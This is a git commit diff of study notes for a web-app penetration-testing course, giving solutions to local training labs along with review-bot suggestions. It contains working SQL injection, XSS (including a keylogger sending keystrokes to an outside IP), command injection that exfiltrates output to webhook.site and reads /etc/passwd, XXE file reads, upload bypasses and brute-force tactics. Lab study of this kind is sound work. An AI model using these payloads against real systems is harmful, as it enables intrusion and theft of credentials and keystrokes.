Web app - SQL injection notes
syselement committed Feb 24, 2025
1 parent 14b7628 commit 7b26ace
Showing 8 changed files with 361 additions and 80 deletions.
145 changes: 68 additions & 77 deletions peh/6-webapp/1-web-lab.md
Expand Up @@ -19,14 +19,17 @@ sudo /opt/pimpmykali/pimpmykali.sh
# Run menu option E for the WebApp Labs
# The labs start automatically

# To START the labs
cd $HOME/peh/labs
./start-peh-labs.sh

# To (only) STOP the labs
sudo docker stop $(sudo docker ps -aq)

# To STOP and CLEANUP the labs
cd $HOME/peh/labs
./cleanup-peh-labs.sh
# This script removes ALL DOCKER CONTAINERS and NETWORKS!!!

# To START the labs
cd $HOME/peh/labs
./start-peh-labs.sh
```

- Run Burp Suite and open its proxy browser
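Review bot: the "To (only) STOP the labs" command `sudo docker stop $(sudo docker ps -aq)` stops every container on the host, not just the lab containers, yet only the cleanup script carries the "removes ALL DOCKER CONTAINERS" warning. Either add the same caveat on that line or narrow the selection (for example `docker ps -q --filter name=...` on the lab container names) so a reader running the labs on a shared Kali box is not surprised.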
Expand All @@ -37,35 +40,23 @@ cd $HOME/peh/labs

> # Lab solutions
>
> ## Injection0x01
>
> - basic SQLi
>
> ## Injection0x02
>
> - login as jeremy:jeremy
> - check the cookie used as a session token
> - break it by adding a '
> - notice the page doesn't show the welcome message now that there is a SQL error
> - write a script to extract jessamy's password
>
> ## Injection0x03
>
> - sushi shop
> - product search
>- product search
> - UNION select to enum other tables
> - find creds & login
>
>- find creds & login
>
> ### solutions:
>
>
> `Tanjyoubi Sushi Rack' UNION SELECT username,password,null,null from injection0x03_users-- -`
>
> ## XSS 0x01
>
> `<img src=x onerror=alert(1);>`
>
>
>## XSS 0x01
>
>`<img src=x onerror=alert(1);>`
>
> ## XSS 0x02
>
>
> `<img src=x onerror=alert(1);>`
>
> `<script>function logKey(event){fetch("http://10.10.100.146:4444/e?c=" + event.key)} document.addEventListener('keydown', logKey);</script>`
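Review bot: Injection0x02 stops at "write a script to extract jessamy's password" with no payload or script recorded, while Injection0x03 and the XSS labs keep their working payloads. Note the boolean condition the script tests (the welcome message disappearing when the injected cookie causes a SQL error, per the preceding lines) and which cookie field it injects into, or link the script, so the lab can be replayed. The Injection0x03 UNION payload also uses four columns (`username,password,null,null`) without saying how the column count was found; a short `ORDER BY` probe line would make that reproducible.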
Expand All @@ -75,91 +66,91 @@ cd $HOME/peh/labs
> ## Command Inj 0x01
>
> `https://tcm-sec.com; whoami; asd`
> `; cat /etc/passwd; asd`
>
> ## Command Inj 0x02
>
> `https://tcm-sec.com/& whoami& asd`
>`; cat /etc/passwd; asd`
>
>## Command Inj 0x02
>
>`https://tcm-sec.com/& whoami& asd`
> `https://tcm-sec.com/ | sleep 10 | asd`
>
> `https://webhook.site/<id>/?`whoami``
>
> ## Command Inj 0x03
>
> `45123)^2))}';whoami;#`
>
> ## File upload 0x01
>
> - Intercept
>
>## File upload 0x01
>
>- Intercept
> - Change contents
> - Or turn off JS
>
> ## File upload 0x02
>
> - Bypass the client-side again
> - Intercept and change the content-type to image/png or image/jpeg
>
> ## File upload 0x03
>
> - Bypass the client-side again
>- Intercept and change the content-type to image/png or image/jpeg
>
>## File upload 0x03
>
>- Bypass the client-side again
> - Intercept and change the content-type again
> - Use an extension that's not in the blocklist (.phtml)
>
> ## Authentication 0x01
>
> - Brute force
>
>
>## Authentication 0x01
>
>- Brute force
>
> ## Authentication 0x02
>
> - MFA code, switch username (code is OK for all users)
> - Or, just brute the code
>
>- Or, just brute the code
>
> ## Authentication 0x03
>
> - Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
>
> - common password list:
>
> ```
>
>- Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
>
>- common password list:
>
>```
> password
> password123
>password123
> letmein
> manchesterunited
> ```
>
> - common usernames list: `/usr/share/seclists/Usernames/Names/names.txt`
>
> ## XXE, IDOR, capstone
>
> ### XXE 0x01
>
>```
>
>- common usernames list: `/usr/share/seclists/Usernames/Names/names.txt`
>
>## XXE, IDOR, capstone
>
>### XXE 0x01
>
> ```
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE creds [
> <!ELEMENT creds ANY >]>
> <creds><user>username</user><password>pass</password></creds>
> ```
>
> ```
>```
>
>```
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE creds [
><!DOCTYPE creds [
> <!ELEMENT creds ANY >
> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
> <creds><user>&xxe;</user><password>pass</password></creds>
> ```
>
>
> ### IDOR
>
>
> `fuzz the parameter`
>
> - find an admin user (or all of the admin users)
>
>
> ### Capstone
>
>
> SQLi to get into admin panel
> File upload to get RCE
>
> - XSS in the message alert
>
>- XSS in the message alert
> - XSS in account names probably? need to test
>
> - brute force user accounts
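Review bot: the Command Inj 0x02 line `https://webhook.site/<id>/?`whoami`` nests backticks inside a single-backtick code span, so Markdown will render it broken; delimit that span with double backticks instead. The Command Inj 0x03 payload `45123)^2))}';whoami;#` is also recorded without any note on what the `)^2))}'` prefix is closing, unlike the other labs; one line on the injection context would save re-deriving it next time.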
Expand All @@ -169,8 +160,8 @@ cd $HOME/peh/labs
> `http://localhost/capstone/coffee.php?coffee=3' or 1=1-- -`
>
> `http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20from%20users--%20-`
>
> # To do list
>
>
># To do list
>
> - file upload capstone
> - auth0x03 testing
>- auth0x03 testing
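Review bot: the capstone UNION URL is stored fully URL-encoded, which hides that it is the same `-- -` comment trick as the `or 1=1` line above it; keep the decoded form `1' union select null,username,password,null,null,null,null from users-- -` beside it and record how the seven columns were determined, since the sushi-shop lab earlier in the file needed four. The "XSS in account names probably? need to test" item in the capstone section is also an open task and belongs in the To do list here rather than among the solutions.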